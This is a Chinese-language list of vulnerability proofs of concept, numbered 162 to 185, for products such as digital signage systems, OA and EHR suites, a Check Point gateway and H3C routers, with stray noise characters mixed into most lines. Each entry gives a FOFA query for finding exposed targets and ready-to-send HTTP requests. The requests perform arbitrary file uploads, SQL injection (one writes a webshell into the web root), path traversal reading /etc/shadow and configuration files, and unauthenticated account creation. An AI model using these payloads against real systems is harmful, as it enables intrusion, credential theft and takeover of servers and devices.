3 F! J/ A% I" \* {3 o, n5 O) z; Z<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>! u# {1 p9 r: o# c3 s) c5 X
<tag>3</tag># V+ s! _5 [9 q* r4 T1 H
</UploadResume>
& b! ~- Z7 N- V* N</soap:Body>
2 i4 E% h' Z! K</soap:Envelope>
3 @) E8 Z6 F- R: m5 Q% M* g
+ _! l/ J, } k- I" i2 A
/ r1 I( q, \0 M$ Shttp://x.x.x.x/dizxdell.aspx$ J1 a$ z1 v5 K$ d( j# ~/ ^
' W1 q' Y$ R0 U7 B9 q8 z1 M4 |
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
' v/ s7 c1 X, xFOFA: app="和丰山海-数字标牌"( F+ u, G8 e- `. s. z, {6 N
POST /QH.aspx HTTP/1.1
% R% x/ }7 Q) N* v0 rHost: x.x.x.x
* K- `* {. t$ M# N& y$ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.09 c- L' k/ N# [
Connection: close/ b" U7 K3 v6 N
Content-Length: 583, g+ K6 T% {7 e% }/ H- E( I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
5 f( e1 v! _; }5 c& @$ g) LAccept-Encoding: gzip
( Z, R0 M2 m9 \/ P9 N- n2 a( S* M+ D' r
------WebKitFormBoundaryeegvclmyurlotuey
/ V4 g. Y h1 _; bContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
7 C5 w$ R7 f+ }! dContent-Type: application/octet-stream
/ N( M6 v( W, n' f
1 _, j0 M! A5 K<% response.write("ujidwqfuuqjalgkvrpqy") %>
4 z* V& K9 e* r7 K8 q------WebKitFormBoundaryeegvclmyurlotuey
9 J: Y, {1 p2 ^& B4 SContent-Disposition: form-data; name="action"3 `9 V, Q3 x+ V1 P
- F$ s. ?+ }' X9 l
upload
8 ` ^7 m; l5 ]( v/ i------WebKitFormBoundaryeegvclmyurlotuey/ }- W- }: `/ x; I
Content-Disposition: form-data; name="responderId"
! F d8 {: s6 _, q# C+ A- Q
8 o1 e, x! o9 ?ResourceNewResponder
^( o6 n8 @# a& G) F------WebKitFormBoundaryeegvclmyurlotuey& }) B% \$ T2 x' n; e- S
Content-Disposition: form-data; name="remotePath"5 m2 r, I/ q7 I3 v i
! `) R c8 Q v/opt/resources* c2 T% n* U! {+ X3 H8 s( b
------WebKitFormBoundaryeegvclmyurlotuey--
& o7 m" o7 s4 k! B2 G7 _; @: ]0 s* ` V1 Z! `7 z; y2 Z9 t
6 ^6 O7 x2 B1 x% M5 X. ~; Zhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx4 h' X. I; f2 v
: `' W3 |' L- s0 M4 h
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传" }; l! Q- J0 o$ C$ R# c3 M [
FOFA: icon_hash="-795291075"5 Z' U/ p7 Q2 ?- U
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
b6 A/ a" D0 P' I1 yHost: x.x.x.x, |* Y( O8 E3 V; S: w3 m' ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36. x a9 n; o( W
Connection: close. E: Z6 ^. s) q: s+ [4 R/ I/ x
Content-Length: 293
; j P$ n4 R. i4 w: [& UAccept: */*
9 T# O4 l# J O- M& A( ~) _: F* O0 HAccept-Encoding: gzip, deflate
8 s; C$ R0 F) N; m7 ^6 hAccept-Language: zh-CN,zh;q=0.93 q' K4 ?, g8 _7 k& c
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod: r2 Q4 E5 n6 c' f9 W' k
; S1 n3 P: w% ~8 j0 x- D------iiqvnofupvhdyrcoqyuujyetjvqgocod
, H* C, j p7 l* l. I9 }, gContent-Disposition: form-data; name="name"
' ~9 Y1 D$ a/ h$ M' ?% |+ v8 U, j
1.php
6 O! H1 P; ~9 C------iiqvnofupvhdyrcoqyuujyetjvqgocod
* _! b' B1 ^1 y- w/ [Content-Disposition: form-data; name="upfile"; filename="1.php"! I1 p% q% E. u b9 G; f
Content-Type: image/jpeg" n4 A$ m+ [" \9 X: x" ?
; b# j! g1 i9 p7 ?3 hrvjhvbhwwuooyiioxega
) s4 K4 t8 {. H; i$ S------iiqvnofupvhdyrcoqyuujyetjvqgocod--
7 ?; H7 q3 f7 b8 h" U5 a8 l5 Q& W9 u; h
8 M F; ?% G0 q' B% y V8 @164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传, b w# [% d, A$ w6 x" Z
FOFA: title="智慧综合管理平台登入" P( I$ ]; b5 S2 N2 o) g- u6 R, l
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.10 j" x( N9 [0 L6 q- A, @( t# Y
Host: x.x.x.x- W h5 G' L2 C# q" I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.06 a8 L0 A5 E, C
Content-Length: 2884 ?3 i4 y9 e2 D& i
Accept: application/json, text/javascript, */*; q=0.01
) h4 [- h9 R1 n! J. `) OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
! E; a! q$ N( T2 g- BConnection: close
- ]; A- j3 ]. a0 x; \6 jContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* c: ]4 ~2 u8 p( ~8 T1 w! IX-Requested-With: XMLHttpRequest
9 U A) R7 ]) F+ o4 {: I- z) c& f, g. OAccept-Encoding: gzip# V. G8 k: r# ~; s: l g
& \8 X! v: }4 e1 Z3 j* F. {
------dqdaieopnozbkapjacdbdthlvtlyl! t" J( x% t; t8 s+ b) j
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"4 E8 @( P; q& O6 p/ G- C4 k
Content-Type: image/jpeg
: R# z/ ~* r/ Z3 r* v$ d5 P1 Q
3 N: \1 [# C9 D<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>3 H/ |: R# n6 f" \
------dqdaieopnozbkapjacdbdthlvtlyl--( a0 V+ I- U: p' Z: W& _
$ d! r2 b" {& I& T2 k5 _- _
' _$ L$ G- G/ p. C0 e
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx6 q+ M W: X4 l9 C% k& P
5 C5 o& Q9 x; l
165. OrangeHRM 3.3.3 SQL 注入
3 K) V3 s: \9 CCVE-2024-36428. Z4 ]# h9 k' F( U0 M
FOFA: app="OrangeHRM-产品"$ X2 J4 M4 q" _1 ~/ D! g
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))3 y# P& T4 u9 b. B9 @: m
0 H, p" D- j+ I4 H5 M
; ?& z. Z* O$ l1 u
166. 中成科信票务管理平台SeatMapHandler SQL注入% I: q* @2 o3 |( S$ l1 [4 ?
FOFA:body="技术支持:北京中成科信科技发展有限公司"- m& o% v! t& i7 Q% k, ^) X3 b3 F9 T; T
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
8 c! S5 v" u z# FHost:
0 d N+ N6 U, f9 U( xPragma: no-cache9 N% ~/ U$ `$ \. q
Cache-Control: no-cache; O5 Y% J$ I; M1 b' v% h( c
Upgrade-Insecure-Requests: 1! E. J, M3 _- D. s$ R. C2 R# V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
, i8 C7 t8 b+ M0 x+ r8 a+ L5 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 _ @- @0 E; MAccept-Encoding: gzip, deflate
7 O$ b3 _# m0 t0 |$ a7 i( cAccept-Language: zh-CN,zh;q=0.9,en;q=0.8! C* v8 w' f+ f6 K; w
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
$ {( u" U8 u* xConnection: close
4 m2 ~" h8 d0 i3 UContent-Type: application/x-www-form-urlencoded
0 Y! u& x9 n. {( d# qContent-Length: 89
5 Q$ t; g0 X+ R" s' Z% S$ |% i3 W. e5 G+ q6 n" i' X6 g
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE) G( a$ v P k8 V( ^4 ^5 }
8 t8 E) h9 y) O" u& V! O, N
" ^ J, d; ]2 j5 |6 M: a: h) ]167. 精益价值管理系统 DownLoad.aspx任意文件读取/ ~$ D) O- g* Y5 @6 q
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
2 @: F/ \+ J6 T6 `- t7 t1 K$ aGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
& S, g$ F' I$ n( C' z8 oHost:
/ _# T3 G0 m2 Z2 K6 Z1 u2 d% MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" x0 M) }% K- T) U1 P \. r5 uContent-Type: application/x-www-form-urlencoded+ {! a3 q1 ^6 h
Accept-Encoding: gzip, deflate
- u6 [2 Z& V1 m x8 j2 u, i1 XAccept: */*0 n8 I0 Q, |' s4 ^8 Q
Connection: keep-alive
. t/ j* k. H6 W5 ^9 h, n) f+ N3 k F5 n* y( ^. b
X, `4 M, u" O0 P8 [( R# N168. 宏景EHR OutputCode 任意文件读取
" G% ~$ E- |" V. k8 |FOFA:app="HJSOFT-HCM"
: h! a! E5 u+ a1 M4 G6 XGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
; P% }9 i( _. LHost: your-ip
5 I# f' d6 i4 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 A" y1 R% O/ L4 ?
Content-Type: application/x-www-form-urlencoded! H1 A1 B& K# l) a7 ]" `: |' e
Connection: close
9 d- E: |' G* ?* E8 E' _: H# o
# g) n4 C1 D d! n/ A* g1 m
+ Z8 y/ t4 s4 `
+ B9 {: k5 Y' `% T+ K+ M169. 宏景EHR downlawbase SQL注入
/ i* N4 O/ g) s' h/ A. V6 ZFOFA:app="HJSOFT-HCM"; k2 H4 o: [6 J! i6 E
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1- h; a; y6 _8 @6 d$ O
Host: your-ip
, ? J$ m [ d/ F# M; k2 h7 D! `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( b/ k+ q7 e4 k: r
Accept: */*, E& `% N9 |& O0 f
Accept-Encoding: gzip, deflate0 S1 G) p4 r2 V! X
Connection: close
; d) \% a! t; m; m6 J. X
0 n) p" D, G C3 A1 D% Q% x, M9 o! b5 n. s0 n, W3 o
d( q; v8 ~6 ^1 u) o- E170. 宏景EHR DisplayExcelCustomReport 任意文件读取
" M4 n: {- `! l( @/ X" MFOFA:body="/general/sys/hjaxmanage.js"
9 Q7 }' ? @7 Z0 Y7 Y+ n/ @POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
/ U3 }7 [; F1 i4 ZHost: balalanengliang
; F5 J; C5 y% D, N2 D. D. qUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 X4 ~6 t& p7 k& p; ]1 k, t
Content-Type: application/x-www-form-urlencoded6 ^' b7 L- b: D" ?% e
1 `' L! L% T1 ^& t
filename=../webapps/ROOT/WEB-INF/web.xml* d( |: _. |$ o1 {
2 j6 }+ V8 @. ]0 |& }
, a# [: p2 R( z0 W* c+ a
171. 通天星CMSV6车载定位监控平台 SQL注入
, Y# ^3 s0 d, e, x% F1 SFOFA:body="/808gps/"
) X9 X0 z+ H9 V. u9 }& yGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
9 [9 N# S; u" CHost: your-ip( [$ `' I% |6 K/ O" ?# L% Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
3 ~- [* y, ?8 O- i2 @' e) w/ CAccept: */*
8 |7 y# K4 Y5 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, E: o' }# q3 [( c( ^; q3 r4 T3 N" V
Accept-Encoding: gzip, deflate( t8 k4 t8 k! r( d2 f8 T$ g
Connection: close
% t" [: p1 z% j/ t$ \1 z; u" z" F1 a$ B6 b3 `
, }0 [) G) f q* s8 i& k5 V2 \5 K
5 m. J4 H; h) t) l9 [172. DT-高清车牌识别摄像机任意文件读取
, ?- @, |7 }* Z a' r5 r+ V6 L. P% NFOFA:app="DT-高清车牌识别摄像机"7 Y; I% C$ a5 B" g* \. B7 G7 B5 {
GET /../../../../etc/passwd HTTP/1.1
( F* E) n! ~0 s7 v k1 r3 pHost: your-ip
, O# I; F3 u+ q8 ?6 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- G Z, ^0 p. i
Accept-Encoding: gzip, deflate5 K8 }' u7 g. \; Q8 K5 x3 }. T
Accept: */*
# L* ~% ]4 r- a7 LConnection: keep-alive* O" P3 @# R2 a- J% F! q+ p# e
1 r* u- R* }+ ~2 N% s2 ^5 U4 a
( X, M7 R1 l( p8 V! S
7 ^* V# _1 U! H& {7 |( k
173. Check Point 安全网关任意文件读取
/ P" R; O. a, B3 _CVE-2024-24919
2 z! g8 N, A- L# W: KFOFA:app="Check_Point-SSL-Network-Extender"
! k. A- G* [: Q! ^( y/ q9 \POST /clients/MyCRL HTTP/1.12 L$ U. E. f, u, Q( l
Host: your-ip
) M- C @3 g& }/ n7 kContent-Type: application/x-www-form-urlencoded
" j1 U9 \2 u; W; C+ a5 I9 t2 x. q/ d. o# [
aCSHELL/../../../../../../../etc/shadow2 X* {6 W' ~( S1 k; E! e7 I6 @
1 [$ s% Q9 y6 g! G( o5 [7 V1 ^
/ c+ y a6 |! s' |, Z
% p9 F' y: K4 X174. 金和OA C6 FileDownLoad.aspx 任意文件读取3 _; D' K# M: Q! Q4 l; L) B B4 z+ V
FOFA:app="金和网络-金和OA"
) D/ c i: H, ]( W! z! a; wGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
1 x4 v) g. n! g3 J+ U+ q- bHost: your-ip: K8 s4 E! Q* ` M6 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( }5 F% O% f) j5 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 F0 P$ y1 m/ O5 x2 ]7 \. `7 XAccept-Encoding: gzip, deflate, br7 q1 q2 L$ k! Q8 z" Z! m( i K% i
Accept-Language: zh-CN,zh;q=0.98 P0 h2 [2 U/ }( L& u7 e3 x0 J" I
Connection: close% A% L" ?/ I+ E5 l& a& u
$ @ x5 q5 d6 [1 h
8 o* q) K0 x/ w5 N ]4 |+ |# E u( r5 E2 ~3 W0 m5 ?
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
6 k B& b+ y4 Y" uFOFA:app="金和网络-金和OA": ?+ Q4 I7 X" j. }1 C. C
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1+ C+ G9 b- c: F) \ ~1 O9 y
Host:+ J6 }# i( H& Y6 |, I
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.364 d# S B7 l% y# T* w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" u+ h- q5 R5 j! w& K- B! z- kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 `* p% h1 O: q: \4 CAccept-Encoding: gzip, deflate
0 T- @6 Q- R( C& ~6 [Connection: close: c& A @0 u. Z9 f
Upgrade-Insecure-Requests: 1
- p* D* [; m9 S1 l) Z* r- x3 Q U& |+ S2 W E! x
/ ^1 M, Q8 X. y. C
176. 电信网关配置管理系统 rewrite.php 文件上传$ _* a5 E4 g; m) \. L; W, A, A0 o
FOFA:body="img/login_bg3.png" && body="系统登录"
7 A+ d/ B5 G( ^POST /manager/teletext/material/rewrite.php HTTP/1.1
- x* b0 |) I% {* m6 k; }0 JHost: your-ip ~7 _' }, w4 d" Y% y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
9 C, h5 l' ]' n( JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
* J. P( ~6 q- B) J1 K, ~2 LConnection: close# {6 v; u( q3 L. ~( O
: T& R* o/ {5 N; _3 r" @) b
------WebKitFormBoundaryOKldnDPT
0 l z6 H# h% V9 ~* i* KContent-Disposition: form-data; name="tmp_name"; filename="test.php"
& S9 h: F. t' C: _Content-Type: image/png
! J7 b& R1 r& w ) c8 @ d) Z3 d5 R- @
<?php system("cat /etc/passwd");unlink(__FILE__);?>
' d( I8 _; {1 ]0 @! t6 {------WebKitFormBoundaryOKldnDPT& c5 P8 G( P6 b$ a# L; Y5 g Q2 t
Content-Disposition: form-data; name="uploadtime"7 U, X% Y M' T# J* z
7 J! Y$ ]. g' Y I! B+ D5 U
1 M( l+ w+ W; i+ o: L% }% J3 q* |
------WebKitFormBoundaryOKldnDPT--
1 ]2 T$ I0 d+ F# J5 I7 G a; O! W3 N9 Z3 _& M$ V) u
) u( g, E# d4 z, K; O. o
+ @9 j( m( t* Q4 p' D" K177. H3C路由器敏感信息泄露
5 L9 `2 G3 ^% _/ a& j! k/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg, b, p6 H) e1 i$ }( k$ I/ E) n
/userLogin.asp/../actionpolicy_status/../M60.cfg* _8 m1 a1 D$ A2 I
/userLogin.asp/../actionpolicy_status/../GR8300.cfg p, p/ y+ g4 ~
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
- u8 {: s: ^, O2 P# X6 B3 f/userLogin.asp/../actionpolicy_status/../GR3200.cfg/ e5 U- d5 { J% F7 T: c
/userLogin.asp/../actionpolicy_status/../GR2200.cfg4 I2 L" Y* W# m: U+ [
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg6 F9 a, w; q8 H& a4 z+ t5 `$ {
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
6 ^# i) f# T: T! Q' ]/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg7 C. J% r* R0 M* Y) Y
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg. G& `( M2 \' j' i) p {. @
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
0 t( i, B& \6 Q0 j7 G6 ? A/userLogin.asp/../actionpolicy_status/../ER5100.cfg
9 l& z z! p8 K' o8 F# R- o/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg w1 n4 g2 {# \, t- {+ c
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
; s+ _# H- D' @6 P/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
) q/ u; B8 G+ Z8 L/userLogin.asp/../actionpolicy_status/../ER3200.cfg8 I* o3 ^8 R( \1 W. J2 T
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg: g! u% T* Y& u1 Q
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg( \9 j& ^9 `+ a
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
* U$ ~; a$ \' F/userLogin.asp/../actionpolicy_status/../ER3100.cfg' |* r1 X, W4 R! f$ Z/ W$ y
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg- ?! c0 u# Q& L% u; u
0 P+ G* N8 z9 w. V( R( Y; D! e+ v! k3 H1 K& \: P
178. H3C校园网自助服务系统-flexfileupload-任意文件上传2 G- X2 y' I1 R( m; u
FOFA:header="/selfservice"- @9 Z. T5 K, c
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.14 c- p% D- P5 J
Host:+ s" N' R: m& e0 Q, T* C s8 p4 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 y( D! \7 X! U- ^Content-Length: 252
1 h% a6 T9 A4 u6 E1 UAccept-Encoding: gzip, deflate* d2 V$ s; {* ]7 D! E$ M
Connection: close6 [# y1 |' t2 v- v. [4 K3 v2 s7 Y
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l& J- q; D% q% G6 \% @. `
-----------------aqutkea7vvanpqy3rh2l3 D! F: p. ~% A: ]' m! s
Content-Disposition: form-data; name="12234.txt"; filename="12234"
1 A; V; T4 ?8 CContent-Type: application/octet-stream
' v, ?9 e) A3 m' \, V8 O* oContent-Length: 255
4 Z- Q+ y4 J$ F
& `9 N/ h5 s' _2 _& Z12234
/ |& e) F% C. @-----------------aqutkea7vvanpqy3rh2l--
8 T6 {" L# A- Q8 a% P: R6 b6 ]2 \! K0 k8 S w1 i5 W5 H
% M: X1 f& N+ w1 E: t4 @9 ^GET /imc/primepush/%2e%2e/flex/12234.txt
0 b& f5 L7 j; z: D9 C8 y$ ]" D3 K) I/ A) @
0 a3 k* B# B% J7 i G179. 建文工程管理系统存在任意文件读取) J- k5 _! J! T9 V3 Z
POST /Common/DownLoad2.aspx HTTP/1.1
; Q1 y& ]0 N- ?, c% M( E3 {4 _Host: {{Hostname}}
9 Z6 |/ l9 d: O5 {3 d: KContent-Type: application/x-www-form-urlencoded
2 y$ e' F2 ^' n# ]( N5 \* sUser-Agent: Mozilla/5.0
" A) q4 M* }- v9 ?" M7 p0 c
1 t* s% {3 l& j! Wpath=../log4net.config&Name=& B. e" V* j0 G0 Z/ z9 w( f/ p9 s
# e! O+ d ?8 N
! q: p N: D# c' a, M180. 帮管客 CRM jiliyu SQL注入/ m; Y6 }! t1 Y8 M0 X
FOFA:app="帮管客-CRM"
6 q* X4 T4 l) }% ?) xGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1* J) {& c; y1 e, |: D1 \: a7 M
Host: your-ip
j# Q& R3 c" ]% XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' v. z5 G) Y0 J* R* c3 z$ mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) z7 X9 D- L- f/ k& i6 p1 d7 E. nAccept-Encoding: gzip, deflate
4 X6 |( e1 y8 _Accept-Language: zh-CN,zh;q=0.9
1 V0 N% J: W0 W8 s3 Q* CConnection: close0 E O6 u# m$ B8 H6 z) S
0 B; z w4 F* v, v3 W: L( t
/ F/ S( L, b" s5 e4 O; g
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入" R: _# B1 L' R$ H2 S `" `
FOFA:"PDCA/js/_publicCom.js"* h+ C0 s1 J* B! v; I( g& A
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1/ t/ [; h- W* Y2 \- e$ \8 E& P- v
Host: your-ip0 F8 ^+ ~: z$ g }6 o5 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
% b) M" ?& x k z2 l8 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 e! a: x* y1 V* C3 A2 K. M
Accept-Encoding: gzip, deflate, br
: P9 _" d, R' R0 q8 ]Accept-Language: zh-CN,zh;q=0.9
- |9 \9 Y! Z PConnection: close) @8 c9 i3 @( u, f5 m
Content-Type: application/x-www-form-urlencoded
4 l1 q' n4 ]/ u. a* M9 ?4 _% o3 y2 l" {: B
& g- _( b5 U' P: A2 v& Faction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
+ }2 b8 S7 h+ r V
( @+ J/ j: y4 x$ G
$ E6 N0 J* }2 j182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
2 S6 u* e2 L8 ]; wFOFA:"PDCA/js/_publicCom.js"
2 I8 \ r1 S" M8 N/ zPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1( H: s# r7 M+ ]2 J
Host: your-ip+ n0 U0 F5 f( O8 c" E1 Z/ g( w5 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
; q& a3 L/ L* W( wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' D) N: D0 O: b% M' I1 E$ lAccept-Encoding: gzip, deflate, br
9 M% v. K* i5 M# b8 [Accept-Language: zh-CN,zh;q=0.9& j4 `# U8 [* g: n8 W. ^
Connection: close' }9 _# I( j6 ?1 g2 ^
Content-Type: application/x-www-form-urlencoded
- U, V8 ^6 V6 n& V$ B
/ \7 V3 H0 z1 o
7 Z. `5 w+ |" l, ausername=test1234&pwd=test1234&savedays=1 J; M: p- B) S% N6 L6 N
+ H. n+ J8 G) K
% G" |3 s; R5 e7 W4 q. Q4 q- m* l* q183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入: [' F4 o0 Z! p* b% O3 P
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"0 b- M2 N( Y, p7 ]9 {' H# c
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1, Y% z4 B% T6 x; O T
Host: your-ip$ V5 \; i* q! {, g9 X+ y! e
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.368 m' H9 @: R& a" S1 k) S) x
Accept-Charset: utf-8
- ~" X. a2 O4 V( D" x* SAccept-Encoding: gzip, deflate
0 b% o& R2 M$ \. bConnection: close+ x6 h: j9 p2 X6 w
" l) V' j- A& H- w( U
) @5 T1 X8 W: S% p( |8 `184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加" `' m9 V2 b- R @! G: [
FOFA:server="SunFull-Webs"
! y' {6 h7 a) o% k9 hPOST /soap/AddUser HTTP/1.13 l7 T+ k4 c6 B$ z
Host: your-ip$ @" ^. o& l8 y9 V
Accept-Encoding: gzip, deflate
. k6 c! N6 o6 F) X* p2 @) p6 \% j# CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- k8 v( X* B! j/ Z* u0 b
Accept: application/xml, text/xml, */*; q=0.01% }% r0 m8 }; H1 l$ u
Content-Type: text/xml; charset=utf-8! X" t; r& g# ?, C4 v* D$ D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% n. z# _% `, S9 gX-Requested-With: XMLHttpRequest5 T: [' u7 V* k j' S
: u9 l, a4 q; u# ^5 s- P& i9 [5 R7 [/ R: Y
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56') N3 Q3 a0 H9 ]* A8 s+ v
0 K6 h+ ]( x5 M2 }5 v' k a1 @5 A" T
G7 J4 e, q: s& ~
185. 瑞友天翼应用虚拟化系统SQL注入3 [. O) U. j, I) s6 ^: O
version < 7.0.5.12 M' H/ b. a3 Y. Z) A& M1 G- r
FOFA:app="REALOR-天翼应用虚拟化系统"( X( T! f4 }- n; n" z
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
& y% D/ U! d- tHost: host
